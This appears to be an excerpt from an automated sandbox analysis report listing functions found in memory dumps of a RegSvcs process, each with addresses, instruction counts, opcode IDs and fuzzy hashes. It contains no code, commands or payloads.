                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d7a3c8c8920d2c45b5bc1560a09b2ad84c3e73f11da48b261f2f187a3fc4c219
                                  • Instruction ID: 4b4404966a313c6eb87fd69f9842df16af2c674a5d2408bce3280320078f35c9
                                  • Opcode Fuzzy Hash: d7a3c8c8920d2c45b5bc1560a09b2ad84c3e73f11da48b261f2f187a3fc4c219
                                  • Instruction Fuzzy Hash: C031B03560418AAFCB09AF64D858BBF7BA7FB89310F004019F91687384CB79CD61DB90
                                  Function 05604AEF Relevance: .1, Instructions: 92COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ed6130f9b29963f92d074495b109fb9f6325cda5e4ec8873939c4b3d494acdcf
                                  • Instruction ID: 6400ed41c8b01a8448d2a50ef0ec09180158841e9f344f7238e0ec82e1d9e66a
                                  • Opcode Fuzzy Hash: ed6130f9b29963f92d074495b109fb9f6325cda5e4ec8873939c4b3d494acdcf
                                  • Instruction Fuzzy Hash: 5C21E5303442514BDF3C66268498B3B369BBFC461AF149438DA06CB7D4DF66CC42D780
                                  Function 05600B08 Relevance: .1, Instructions: 87COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cd4c5fee456c8df661dec9685da9e991e8da0e4e8c6c0e11e8c6bb5674c5f54d
                                  • Instruction ID: 9047a62846cc3dd87317ee124b75b8d1125e95e89721b8518422cb9c29450566
                                  • Opcode Fuzzy Hash: cd4c5fee456c8df661dec9685da9e991e8da0e4e8c6c0e11e8c6bb5674c5f54d
                                  • Instruction Fuzzy Hash: 8121E53171021D9BD798AA39580933F6597F7C8330F94556AE90ADB390EA31DD42C7D2
                                  Function 05605D90 Relevance: .1, Instructions: 85COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ea89add8c38996389767ed4124857a25a328cfdbc9f50547f4447a475ac872f8
                                  • Instruction ID: 9f88fe863ecac1633d41915668d6bbf1e2af216f0a8b72b7ffe6ee4e1154b3a3
                                  • Opcode Fuzzy Hash: ea89add8c38996389767ed4124857a25a328cfdbc9f50547f4447a475ac872f8
                                  • Instruction Fuzzy Hash: F0319570E041058FCB18CF6CC884AAFBBB6FF99310B158659E856AB3A1CB349D51CF90
                                  Function 05609472 Relevance: .1, Instructions: 84COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2df28653afb1720b629f34a50d27d60c8697a61481f74cd38695ae31ef139d35
                                  • Instruction ID: 76568ae3dacddf1901d50cf557e93b5c0a5902a3e016b684dd9fc6ceab5bb735
                                  • Opcode Fuzzy Hash: 2df28653afb1720b629f34a50d27d60c8697a61481f74cd38695ae31ef139d35
                                  • Instruction Fuzzy Hash: D521E735B101048FCB48DB79D9949AEBBB7EBCC310B14906AE506EB3A1CA31DC05CB91
                                  Function 05601AE8 Relevance: .1, Instructions: 84COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 80f1d86746329df862457b16e19f2b434c31b43e9b1a115b06bb2933e9fcf6fa
                                  • Instruction ID: 7569bd8a5b46f22282e8ad80c41451ba6f741213bb233c7f74168a864e6c97b6
                                  • Opcode Fuzzy Hash: 80f1d86746329df862457b16e19f2b434c31b43e9b1a115b06bb2933e9fcf6fa
                                  • Instruction Fuzzy Hash: CC31F5316086C58FD70A9F68DC9876A7FB1FF56344F08449AE4458B392EBB8C916CB90
                                  Function 05609480 Relevance: .1, Instructions: 76COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fb126e4383d58c9fa1c0c1be0a15999343364b66ef19b693079d797e5b99349a
                                  • Instruction ID: 2c466fe6951e5b8959aca7b11d5c7e6ff5c069235f54e2e58a83b98de0ac155e
                                  • Opcode Fuzzy Hash: fb126e4383d58c9fa1c0c1be0a15999343364b66ef19b693079d797e5b99349a
                                  • Instruction Fuzzy Hash: 3F21A135B101048FCB48DB69D4949AEBBFBABCD710F15906AE506EB3A1DA31EC05CB91
                                  Function 05602B8A Relevance: .1, Instructions: 74COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 04b3fc7fbb8de9e8cc87f571351fdae33e6b76a70cd7b787c8624ccb793e9e13
                                  • Instruction ID: f2b41ff072b045255cc0693db5f43c519be8c93dbe24aea82595759e05f899be
                                  • Opcode Fuzzy Hash: 04b3fc7fbb8de9e8cc87f571351fdae33e6b76a70cd7b787c8624ccb793e9e13
                                  • Instruction Fuzzy Hash: 6421AE387002019FD748EBB5E998B2B77AAFBC4910B104969D905C7294EF35DC00CBA0
                                  Function 05601B40 Relevance: .1, Instructions: 68COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 78cfb74578d4cf7581adaddb81d9a82fd1fa351058ed77b3258700092f596e6a
                                  • Instruction ID: cac80a9888728e5a1972f0523348266af92892a368f219aafd767ca001f5155c
                                  • Opcode Fuzzy Hash: 78cfb74578d4cf7581adaddb81d9a82fd1fa351058ed77b3258700092f596e6a
                                  • Instruction Fuzzy Hash: 2C21FD3565418A9FCB08AF68D84CB6B7BA6FB85714F00446AE9068B384CB78CC65CBD0
                                  Function 05601500 Relevance: .1, Instructions: 63COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e908dcb11fb1467daef873592df25489cbd0c059a3362666be8c8455554f977e
                                  • Instruction ID: 01acd43f0413153dc0dc06aeea61aac07401ae84958d12057ed692b98a00b61d
                                  • Opcode Fuzzy Hash: e908dcb11fb1467daef873592df25489cbd0c059a3362666be8c8455554f977e
                                  • Instruction Fuzzy Hash: 3821C475A012098FDB04CF94C9809DEFBF6FF89310F1486A9D906AB344EB70AD85CB90
                                  Function 056095C8 Relevance: .1, Instructions: 61COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 35b7d33808865db386253d07c61c998b741295ffd67252b5e4ae7869b4a0dc91
                                  • Instruction ID: 116c3dd0b0e6f5435bfcd3b8be791f0f615b7dd9b23df6ece312e97070b6c203
                                  • Opcode Fuzzy Hash: 35b7d33808865db386253d07c61c998b741295ffd67252b5e4ae7869b4a0dc91
                                  • Instruction Fuzzy Hash: EF118F30B142049BEB1C9A7AD814A7B76ABBBC4710F049529E816C7781EB30CD91C7D0
                                  Function 05602388 Relevance: .1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 97657f1509cdb152faa76a46ab90a84ec86044d1c582d8e2b328fc881901182d
                                  • Instruction ID: beba4c6b1f10b1cfdcedaff18fbe5b808522d16d4b11c73ad07ad7e0f63531c5
                                  • Opcode Fuzzy Hash: 97657f1509cdb152faa76a46ab90a84ec86044d1c582d8e2b328fc881901182d
                                  • Instruction Fuzzy Hash: 6E012832B001556BCB09DE69D818BAF3BDBEFC8B40F148069F905D7280DA71C811DB90
                                  Function 05600C58 Relevance: .0, Instructions: 43COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f28621c0a5a36111d6207fb23077489d2c936abcf2b8d97c8172b61fc954a2ae
                                  • Instruction ID: 5eb8277da51e342d490137f22553b8f3fdfd6ef6c62a3a6bf30e73aa757fab63
                                  • Opcode Fuzzy Hash: f28621c0a5a36111d6207fb23077489d2c936abcf2b8d97c8172b61fc954a2ae
                                  • Instruction Fuzzy Hash: 8B1112B58003498FCB20DF9AC588BDEBBF4FB48724F208419D519A3740C379A944CFA1
                                  Function 05600C60 Relevance: .0, Instructions: 41COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c03f956177e86c3b8cca1feac51c84c20f4dd033d11cdf0584315d3f4ca811ab
                                  • Instruction ID: c96def3d5f4833bc14b18789cd7f87045ed74410caa1f76714793a7ae8ac82c1
                                  • Opcode Fuzzy Hash: c03f956177e86c3b8cca1feac51c84c20f4dd033d11cdf0584315d3f4ca811ab
                                  • Instruction Fuzzy Hash: 9E11F3B58003498FDB20DF9AC484BDEBBF4FB48724F208419D519A7750C779A944CFA5
                                  Function 05609592 Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c39fe158149a2325c3cf1b0cd3c4fe4532a1eb863f0f83840a2574d0cfc6103d
                                  • Instruction ID: 133dcb997f91b7c044695b752be6c6971813946585b85a15df9bab1c00fe188d
                                  • Opcode Fuzzy Hash: c39fe158149a2325c3cf1b0cd3c4fe4532a1eb863f0f83840a2574d0cfc6103d
                                  • Instruction Fuzzy Hash: DBF0EC75719205AFE70D5271AC109F76A27BBE1341F145022E501C73A3D721CD96C360
                                  Function 056010FC Relevance: .0, Instructions: 34COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c61ee80dfb0efce9b6789bd0efd8955857843509d1226862112b050d9410c533
                                  • Instruction ID: 7d67a5a7fbe33946ab23b8d0f6d6f511eafcd281bebe801076b6de8ce47e6fa1
                                  • Opcode Fuzzy Hash: c61ee80dfb0efce9b6789bd0efd8955857843509d1226862112b050d9410c533
                                  • Instruction Fuzzy Hash: D3F031743402409FD368EF24D998F1677B6FBC9724F628294E5259F7E4CB70AC018751
                                  Function 056064C8 Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e342bd9973fc2d41f301fa566336c237bc0987072f774878577236e8e127a883
                                  • Instruction ID: 5de503ac055bdc2159077d44de18a081b74cc17b4a900e1d6bcee55d34e95f7e
                                  • Opcode Fuzzy Hash: e342bd9973fc2d41f301fa566336c237bc0987072f774878577236e8e127a883
                                  • Instruction Fuzzy Hash: 2FE0E531B5011897C74C1678A8002AA75DAA3C5631F008B27D41EC3698DE608D51C344
                                  Function 056064D8 Relevance: .0, Instructions: 24COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4ebe10d33c66f55eaae5fdca2d9a25a997eefc6a6c84b857c672e8d72de646be
                                  • Instruction ID: 394ed67fbc6ce60b74fc8bb7ac7d8290600916bf022dafc203d9c85d5ece6e7d
                                  • Opcode Fuzzy Hash: 4ebe10d33c66f55eaae5fdca2d9a25a997eefc6a6c84b857c672e8d72de646be
                                  • Instruction Fuzzy Hash: 07E08C22B5112993D78C557DA80456BB9CFA3CA671B50D937E90EC7B8CDE60CC2183D9
                                  Function 05600900 Relevance: .0, Instructions: 24COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7488d64581e3abc06c2b70a7d2f17ce19fd96cf611ea0234958127a2bac8411c
                                  • Instruction ID: 3bb550cc902cb7dd94b7383a7e1cd68ab3411ea3dd3fa8539a26ce48fc3bcbb9
                                  • Opcode Fuzzy Hash: 7488d64581e3abc06c2b70a7d2f17ce19fd96cf611ea0234958127a2bac8411c
                                  • Instruction Fuzzy Hash: F5E0263222006C97E648D968A905B53325FE384735F40A826E11AC7304CA7089618392
                                  Function 05607D06 Relevance: .0, Instructions: 23COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f7c6265f1e7c1461dee21e0dec17f58642e8bf85e7b1faf81245ba816cc430bd
                                  • Instruction ID: a2342f30dc2cc3ab34ca2c25ffdc3c0d3752e8e9f3eee37f0f1e096b2f9bb589
                                  • Opcode Fuzzy Hash: f7c6265f1e7c1461dee21e0dec17f58642e8bf85e7b1faf81245ba816cc430bd
                                  • Instruction Fuzzy Hash: 5FE0D8357045014B876CAB24646903673B7EBC820034184778806D77C8CF30AE838B83
                                  Function 05600910 Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 36eea6b0e6e747dfe61c5d3b0d35d382343a3906a993742d7d29d089a8ac6e05
                                  • Instruction ID: 1b9f4c29c665534e2d3c8a8ff6682f56ccbd4a6ddba80956e3468e5416da7930
                                  • Opcode Fuzzy Hash: 36eea6b0e6e747dfe61c5d3b0d35d382343a3906a993742d7d29d089a8ac6e05
                                  • Instruction Fuzzy Hash: 85D02B3235006D57E648546D590A667750F97C5771B80B477E51ACB344C9508D2182D6
                                  Function 05607D6C Relevance: .0, Instructions: 18COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8e20daff0d37c760f730d14fa8fc443baec6af758592cd08794c0dc57f65ea26
                                  • Instruction ID: a67fa544be99390a8e2c2c8ac5f2e9d4a8d9eee4f27afad02f25709c7905a059
                                  • Opcode Fuzzy Hash: 8e20daff0d37c760f730d14fa8fc443baec6af758592cd08794c0dc57f65ea26
                                  • Instruction Fuzzy Hash: 62E086347040004B876CE724956802A7277ABC820034280368812C7B8CDF309D828B83
                                  Function 056011A0 Relevance: .0, Instructions: 18COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 27bf624603a04d6c26aa151f63642c2191d49c37d95fde85c430d5b14dc3d72c
                                  • Instruction ID: dee442b054112147f27ab77c853ac3c5e4f0d7c7a8e5d2b7f28344ab1fc2d641
                                  • Opcode Fuzzy Hash: 27bf624603a04d6c26aa151f63642c2191d49c37d95fde85c430d5b14dc3d72c
                                  • Instruction Fuzzy Hash: 5BE08CB1B002069B9709DF7981A126FB5AB7BC8400340C579C92AEB380EF74D924EBC2
                                  Function 05605C95 Relevance: .0, Instructions: 16COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1ff331b86e86604f083fe007e36a6ac971116db4d426a35934e470918da01ece
                                  • Instruction ID: da08e76be2dcc10c831864a3ae4a7eedd04fa3e6606ebf5f0136232b24525720
                                  • Opcode Fuzzy Hash: 1ff331b86e86604f083fe007e36a6ac971116db4d426a35934e470918da01ece
                                  • Instruction Fuzzy Hash: 46D0673AF40008AFCB049F99E8449DDF776FB98221B04C556F916A3260C6319965DB60
                                  Function 05601394 Relevance: .0, Instructions: 13COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a7616d7d01aa4861cfab7018d2aaaf67ec079f91db6d84d9de7d3b7c343535ec
                                  • Instruction ID: b596e3f57ddf4bd7dfd41f2b8c98ab6379c97572fd8750aca601359c99dea4d7
                                  • Opcode Fuzzy Hash: a7616d7d01aa4861cfab7018d2aaaf67ec079f91db6d84d9de7d3b7c343535ec
                                  • Instruction Fuzzy Hash: 23D01774A101009FC75CEB30E51C919BBB5AB89610351946A9812CBBA4DB309E40CB01
                                  Function 05602B98 Relevance: .0, Instructions: 12COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b36a0fe8f300a26059c6bc0587521841272d6a537c8299a96223e9783ef3d9c0
                                  • Instruction ID: 079474be32ef06e2d5517bd8b85798beca85feca6999bd672977790f897a710b
                                  • Opcode Fuzzy Hash: b36a0fe8f300a26059c6bc0587521841272d6a537c8299a96223e9783ef3d9c0
                                  • Instruction Fuzzy Hash: 88C012384103498BD645F765FD5C715377EB6C0905740D61194094A10DDF749C594F91

                                  Non-executed Functions

                                  Function 02BF4BE0 Relevance: 2.8, Strings: 2, Instructions: 255COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8:|q$fei
                                  • API String ID: 0-456817884
                                  • Opcode ID: cdd8b4623a57fb488cf0654d2e128ee5a2fa6d58430588f62afb7163938fce6d
                                  • Instruction ID: f014b78b76b100b6a8a7147b5456a69acdcfed5c1c702f78441d6dd722dedceb
                                  • Opcode Fuzzy Hash: cdd8b4623a57fb488cf0654d2e128ee5a2fa6d58430588f62afb7163938fce6d
                                  • Instruction Fuzzy Hash: 94A1BD30A142548FCB94CB29C880A7FFBF2AFC9304B19D9AAE25AD7654C734EC45CB50
                                  Function 056083BF Relevance: 2.7, Strings: 2, Instructions: 238COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ^nQ$ykk.
                                  • API String ID: 0-2113457234
                                  • Opcode ID: 6bfe94805ad8eab39a8e8091156d0df1a69c7bb26350d96153db00a38c10d638
                                  • Instruction ID: 6545401b49a02a2b75342dc5861288aca202884aa862893cbf9b163977b5b8cf
                                  • Opcode Fuzzy Hash: 6bfe94805ad8eab39a8e8091156d0df1a69c7bb26350d96153db00a38c10d638
                                  • Instruction Fuzzy Hash: BEA17034B01115CFE7ACEB64C964BAAB777BB89301F1080AAD50AAB785DB319D81CF51
                                  Function 02BF42E8 Relevance: 1.6, Strings: 1, Instructions: 387COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 9(#
                                  • API String ID: 0-2779937032
                                  • Opcode ID: 445609ae2cb9c0509b2184decb3417429e643984e441e984c51efb7bac974e08
                                  • Instruction ID: 23c06406e6c24ae94d4b59d0a11f2325de48097abff39370ddca4e941c2ef1e0
                                  • Opcode Fuzzy Hash: 445609ae2cb9c0509b2184decb3417429e643984e441e984c51efb7bac974e08
                                  • Instruction Fuzzy Hash: B4E1E130B042548FCB49CB69D59066FFBF2EFCA210B1585AAD656EB355C730EC49CB50
                                  Function 05608A63 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $>f
                                  • API String ID: 0-2253003967
                                  • Opcode ID: c8847672d8647c63dff23bca15f19f7d752852387186714050706a18fc895e88
                                  • Instruction ID: 38f6c6f89eed5721471d5e57853260fb83e62b8f1c59ff469866a5023113ac6b
                                  • Opcode Fuzzy Hash: c8847672d8647c63dff23bca15f19f7d752852387186714050706a18fc895e88
                                  • Instruction Fuzzy Hash: A6E16030A10215CFDB58DF64D894BAAB7B6BF89300F1095AAD50AAB391DB319E85CF41
                                  Function 02BF4BD1 Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8:|q
                                  • API String ID: 0-2578389060
                                  • Opcode ID: 8a034ec44066952d3154ed809a70d19eb36b525272eb0eccbaf0636ef3596a2b
                                  • Instruction ID: cb6fec89475f3d5e37fe3113a569abbe11c3effe8f518ccc629d63d9e115af9c
                                  • Opcode Fuzzy Hash: 8a034ec44066952d3154ed809a70d19eb36b525272eb0eccbaf0636ef3596a2b
                                  • Instruction Fuzzy Hash: 24A1D130A142548FC795CB29C480A7FFBF2AFC9304B15D9AAE25AE7655C734EC85CB50
                                  Function 02BFBBC0 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: \VNn
                                  • API String ID: 0-207492048
                                  • Opcode ID: d9a0c8206b56abe283e54a5e482e7ae0e5bcc5978c1db0274b5591e0d102b9b5
                                  • Instruction ID: f69f3f901a64b9aa0d590a02301a841435d630b76dc6432c6604b312ba943de4
                                  • Opcode Fuzzy Hash: d9a0c8206b56abe283e54a5e482e7ae0e5bcc5978c1db0274b5591e0d102b9b5
                                  • Instruction Fuzzy Hash: 0B916B71E00209CFDB64DFA9C8847DEBBF2EF88708F148569E514A7294EB349849CB91
                                  Function 05608467 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ykk.
                                  • API String ID: 0-690924392
                                  • Opcode ID: 3f665a6e87f5dd101fb751aa2e32f1de3266a271de5a6a114dd0ced03b539fb5
                                  • Instruction ID: 2030fb4d78156a4f905723d33d59bd73e8fffbc91ee488abf26f49cc751af586
                                  • Opcode Fuzzy Hash: 3f665a6e87f5dd101fb751aa2e32f1de3266a271de5a6a114dd0ced03b539fb5
                                  • Instruction Fuzzy Hash: D9A16E34B01215CBEBACEB64D864BAAB777BB88301F1080E9D50AAB785DF319D41CF51
                                  Function 05608E50 Relevance: 1.5, Strings: 1, Instructions: 225COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
